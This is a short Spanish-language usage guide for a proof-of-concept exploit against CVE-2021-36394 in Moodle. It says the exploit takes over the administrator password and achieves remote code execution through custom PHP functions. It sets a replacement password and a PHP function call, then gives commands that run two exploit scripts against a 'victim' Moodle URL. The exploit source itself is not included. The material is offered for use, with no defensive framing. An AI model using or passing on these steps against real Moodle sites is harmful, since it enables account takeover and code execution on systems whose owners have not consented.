
Exploit de prueba de concepto para CVE-2021-36394 en Moodle, que permite la toma de control de la contraseña del administrador y la ejecución remota de código a través de funciones PHP personalizadas.
Código personalizado
$newpassword = "Accounttakedover123";
Luego ejecute:
$ CVE2021-36394.php http://victim/path_to_moodle
Código personalizado
$function = "header"; $param = "Hacked: by0d0ff9";
Luego ejecute:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle